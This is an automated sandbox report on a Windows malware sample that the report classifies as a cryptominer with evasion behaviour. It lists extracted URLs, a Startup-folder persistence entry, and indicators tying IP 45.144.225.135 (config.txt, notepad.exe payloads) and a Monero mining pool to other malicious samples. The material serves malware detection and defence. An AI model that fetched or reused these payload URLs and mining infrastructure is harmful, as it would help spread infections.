                                http://www.founder.com.cn/cn/bTheP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmpfalse
                                  		high
                                  https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpfalse
                                    		high
                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.fontbureau.com/designers?P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                        		high
                                        https://corp.roblox.com/contact/svchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmpfalse
                                          		high
                                          http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1svchost.exe, 00000019.00000003.332934004.0000024726986000.00000004.00000001.sdmpfalse
                                            		high
                                            https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.tiro.comP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designersP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.goodfont.co.krP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000014.00000003.309391302.0000019DF3E40000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://45.144.225.135/config.txtllP7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.sajatypeworks.comP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000014.00000003.309307335.0000019DF3E5A000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.typography.netDP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.founder.com.cn/cn/cTheP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.g5e.com/G5_End_User_License_Supplemental_Termssvchost.exe, 00000019.00000003.325656679.00000247269AC000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.galapagosdesign.com/staff/dennis.htmP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://fontfabrik.comP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000014.00000003.309391302.0000019DF3E40000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2004/09/enumerationsvchost.exe, 0000000B.00000002.462497537.00000238030B1000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://45.144.225.135/config.txte=C:P7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://45.144.225.135/config.txtxP7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.galapagosdesign.com/DPleaseP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fonts.comP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.sandoll.co.krP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://en.help.roblox.com/hc/en-ussvchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.urwpp.deDPleaseP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.zhongyicts.com.cnP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.sakkal.comP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.bingmapsportal.comsvchost.exe, 00000014.00000002.309753491.0000019DF3E13000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.apache.org/licenses/LICENSE-2.0P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.fontbureau.comP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                                              		high
                                                                              https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventuresvchost.exe, 00000019.00000003.325656679.00000247269AC000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000014.00000003.309381018.0000019DF3E45000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://www.roblox.com/developsvchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000014.00000003.309391302.0000019DF3E40000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000019.00000003.326466123.000002472699D000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.326515844.000002472694D000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://corp.roblox.com/parents/svchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332934004.0000024726986000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.309753491.0000019DF3E13000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://activity.windows.comtsvchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://%s.xboxlive.comsvchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		low
                                                                                                https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000014.00000003.309363427.0000019DF3E47000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.carterandcone.comlP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://www.fontbureau.com/designers/cabarga.htmlNP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000014.00000002.309851133.0000019DF3E5C000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.founder.com.cn/cnP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.svchost.exe, 0000000B.00000002.469172157.00000238089C0000.00000002.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.fontbureau.com/designers/frere-jones.htmlP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://dynamic.tsvchost.exe, 00000014.00000003.309363427.0000019DF3E47000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.309381018.0000019DF3E45000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.309307335.0000019DF3E5A000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.jiyu-kobo.co.jp/P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.fontbureau.com/designers8P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://www.roblox.com/info/privacysvchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://45.144.225.135/config.txtLP7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://www.g5e.com/termsofservicesvchost.exe, 00000019.00000003.325656679.00000247269AC000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000014.00000002.309851133.0000019DF3E5C000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://activity.windows.comsvchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://RtlGetVersionntdll.dllP7Oa6i5muL.exe, 00000000.00000002.219038679.0000000002FEF000.00000004.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://%s.dnet.xboxlive.comsvchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		low
                                                                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000014.00000003.309307335.0000019DF3E5A000.00000004.00000001.sdmpfalse
                                                                                                                                    		high

                                                                                                                                    Contacted IPs

                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs

                                                                                                                                    Public

                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    144.217.14.139
                                                                                                                                    		unknownCanada
                                                                                                                                    		16276OVHFRtrue
                                                                                                                                    45.144.225.135
                                                                                                                                    		unknownNetherlands
                                                                                                                                    		35913DEDIPATH-LLCUSfalse

                                                                                                                                    Private

                                                                                                                                    IP
                                                                                                                                    192.168.2.1
                                                                                                                                    127.0.0.1

                                                                                                                                    General Information

                                                                                                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                    Analysis ID:448402
                                                                                                                                    Start date:14.07.2021
                                                                                                                                    Start time:07:03:10
                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 10m 42s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Sample file name:P7Oa6i5muL (renamed file extension from none to exe)
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                    Number of analysed new started processes analysed:30
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • HDC enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.expl.evad.mine.winEXE@25/17@2/4
                                                                                                                                    EGA Information:Failed
                                                                                                                                    HDC Information:
                                                                                                                                    • Successful, ratio: 7.3% (good quality ratio 6.3%)
                                                                                                                                    • Quality average: 65.6%
                                                                                                                                    • Quality standard deviation: 33.6%
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                    • Number of executed functions: 187
                                                                                                                                    • Number of non-executed functions: 52
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Adjust boot time
                                                                                                                                    • Enable AMSI
                                                                                                                                    Warnings:
                                                                                                                                    Show All
                                                                                                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, UsoClient.exe, wuapihost.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.139.144, 168.61.161.212, 13.88.21.125, 23.54.113.53, 104.42.151.234, 20.50.102.62, 95.100.54.203, 20.54.104.15, 20.54.7.98, 40.112.88.60
                                                                                                                                    • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    TimeTypeDescription
                                                                                                                                    07:03:58API Interceptor1x Sleep call for process: P7Oa6i5muL.exe modified
                                                                                                                                    07:04:24API Interceptor12x Sleep call for process: svchost.exe modified
                                                                                                                                    07:04:34AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url
                                                                                                                                    07:05:41API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    144.217.14.1391fJCh9Qn75.exeGet hashmaliciousBrowse
                                                                                                                                      73invoice #2307.exeGet hashmaliciousBrowse
                                                                                                                                        45.144.225.135H9QnI1DbC1.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/config.txt
                                                                                                                                        7xhLwiPIrR.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/notepad.exe
                                                                                                                                        qhgv3aRzkZ.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/conhost.exe
                                                                                                                                        zIrx1wUddJ.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/config.txt
                                                                                                                                        E91sLsvV8S.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/config.txt
                                                                                                                                        SecuriteInfo.com.Trojan.GenericKD.46284216.26505.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/notepad.exe
                                                                                                                                        notepad.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/notepad.exe
                                                                                                                                        taskhost.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/config2.txt
                                                                                                                                        csrss.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/notepad.exe
                                                                                                                                        notepad.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/config.txt
                                                                                                                                        RcyatUBgOo.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/notepad.exe
                                                                                                                                        1fJCh9Qn75.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/notepad.exe
                                                                                                                                        xS9h6XCLaY.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/notepad.exe
                                                                                                                                        WHK1KXo5rL.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/notepad.exe
                                                                                                                                        ifulH09vsC.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/notepad.exe
                                                                                                                                        SecuriteInfo.com.Trojan.Siggen12.56619.6518.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/notepad.exe
                                                                                                                                        SecuriteInfo.com.__vbaHresultCheckObj.21994.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/config.txt
                                                                                                                                        SecuriteInfo.com.Trojan.Siggen12.45962.28547.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/godeth.exe
                                                                                                                                        SecuriteInfo.com.Variant.Johnnie.321295.17359.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135/config.txt

                                                                                                                                        Domains

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                        xmr-us-east1.nanopool.orgH9QnI1DbC1.exeGet hashmaliciousBrowse
                                                                                                                                        • 144.217.14.139
                                                                                                                                        7xhLwiPIrR.exeGet hashmaliciousBrowse
                                                                                                                                        • 142.44.243.6
                                                                                                                                        qhgv3aRzkZ.exeGet hashmaliciousBrowse
                                                                                                                                        • 144.217.14.139
                                                                                                                                        zIrx1wUddJ.exeGet hashmaliciousBrowse
                                                                                                                                        • 142.44.242.100
                                                                                                                                        E91sLsvV8S.exeGet hashmaliciousBrowse
                                                                                                                                        • 142.44.243.6
                                                                                                                                        SecuriteInfo.com.Trojan.GenericKD.46284216.26505.exeGet hashmaliciousBrowse
                                                                                                                                        • 144.217.14.109
                                                                                                                                        notepad.exeGet hashmaliciousBrowse
                                                                                                                                        • 142.44.242.100
                                                                                                                                        csrss.exeGet hashmaliciousBrowse
                                                                                                                                        • 144.217.14.109
                                                                                                                                        notepad.exeGet hashmaliciousBrowse
                                                                                                                                        • 192.99.69.170
                                                                                                                                        RcyatUBgOo.exeGet hashmaliciousBrowse
                                                                                                                                        • 144.217.14.109
                                                                                                                                        1fJCh9Qn75.exeGet hashmaliciousBrowse
                                                                                                                                        • 144.217.14.109
                                                                                                                                        xS9h6XCLaY.exeGet hashmaliciousBrowse
                                                                                                                                        • 142.44.243.6
                                                                                                                                        4FNTlzlu10.exeGet hashmaliciousBrowse
                                                                                                                                        • 142.44.242.100
                                                                                                                                        73invoice #2307.exeGet hashmaliciousBrowse
                                                                                                                                        • 142.44.242.100

                                                                                                                                        ASN

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                        DEDIPATH-LLCUSPO7581.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.15.143.171
                                                                                                                                        CreditCardAuth.jarGet hashmaliciousBrowse
                                                                                                                                        • 45.133.1.212
                                                                                                                                        CreditCardAuth.jarGet hashmaliciousBrowse
                                                                                                                                        • 45.133.1.212
                                                                                                                                        Receipt09072021.jarGet hashmaliciousBrowse
                                                                                                                                        • 45.133.1.212
                                                                                                                                        Receipt09072021.jarGet hashmaliciousBrowse
                                                                                                                                        • 45.133.1.212
                                                                                                                                        Swift Payment Copy.exeGet hashmaliciousBrowse
                                                                                                                                        • 74.201.28.104
                                                                                                                                        H9QnI1DbC1.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135
                                                                                                                                        7xhLwiPIrR.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135
                                                                                                                                        D6zIdvQnRQ.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.133.1.212
                                                                                                                                        UPS_Doc203139.jarGet hashmaliciousBrowse
                                                                                                                                        • 45.133.1.212
                                                                                                                                        UPS_Doc203139.jarGet hashmaliciousBrowse
                                                                                                                                        • 45.133.1.212
                                                                                                                                        djBbDPfGV3.exeGet hashmaliciousBrowse
                                                                                                                                        • 74.201.28.127
                                                                                                                                        uXlQdzKw2Q.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.133.1.67
                                                                                                                                        qhgv3aRzkZ.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135
                                                                                                                                        13Izi42oYq.exeGet hashmaliciousBrowse
                                                                                                                                        • 74.201.28.60
                                                                                                                                        HmT3NS0FnD.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.133.1.67
                                                                                                                                        BfdkXo6xoH.exeGet hashmaliciousBrowse
                                                                                                                                        • 185.177.118.233
                                                                                                                                        xnuE49NGol.exeGet hashmaliciousBrowse
                                                                                                                                        • 185.177.118.233
                                                                                                                                        HuPjcvVze1.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.15.170.116
                                                                                                                                        zIrx1wUddJ.exeGet hashmaliciousBrowse
                                                                                                                                        • 45.144.225.135
                                                                                                                                        OVHFRTNT Shipping doc.exeGet hashmaliciousBrowse
                                                                                                                                        • 167.114.179.8
                                                                                                                                        CARGOS10029032.vbsGet hashmaliciousBrowse
                                                                                                                                        • 167.114.22.12
                                                                                                                                        rz89FRwKvB.exeGet hashmaliciousBrowse
                                                                                                                                        • 178.33.222.243
                                                                                                                                        Qoxd7fpbvy.exeGet hashmaliciousBrowse
                                                                                                                                        • 137.74.76.180
                                                                                                                                        ohSTDjgBHr.docGet hashmaliciousBrowse
                                                                                                                                        • 54.38.220.85
                                                                                                                                        ohSTDjgBHr.docGet hashmaliciousBrowse
                                                                                                                                        • 54.38.220.85
                                                                                                                                        ohSTDjgBHr.docGet hashmaliciousBrowse
                                                                                                                                        • 54.38.220.85
                                                                                                                                        Omk46bhBvk.exeGet hashmaliciousBrowse
                                                                                                                                        • 94.23.247.226
                                                                                                                                        PO No. JTL-009-2021-07.exeGet hashmaliciousBrowse
                                                                                                                                        • 192.99.153.170
                                                                                                                                        1ozUQfU7uo.exeGet hashmaliciousBrowse
                                                                                                                                        • 37.59.103.148
                                                                                                                                        Pay Slip- No-$142,851.53.htmlGet hashmaliciousBrowse
                                                                                                                                        • 145.239.131.51
                                                                                                                                        ALGJU8LLCKYM5SN.EXEGet hashmaliciousBrowse
                                                                                                                                        • 51.195.43.214
                                                                                                                                        ADI INV-RECON #_891976.htmlGet hashmaliciousBrowse
                                                                                                                                        • 145.239.131.51
                                                                                                                                        1BhmQQkiR5BrTs5yBLUVwWjLMfQhv4xjUX.jarGet hashmaliciousBrowse
                                                                                                                                        • 158.69.53.93
                                                                                                                                        Order_1537-25.exeGet hashmaliciousBrowse
                                                                                                                                        • 51.75.128.155
                                                                                                                                        Uar3K96M3X.exeGet hashmaliciousBrowse
                                                                                                                                        • 54.37.106.167
                                                                                                                                        UAbXH2SmaO.exeGet hashmaliciousBrowse
                                                                                                                                        • 54.37.106.167
                                                                                                                                        998h1TUZsk.exeGet hashmaliciousBrowse
                                                                                                                                        • 51.91.76.59
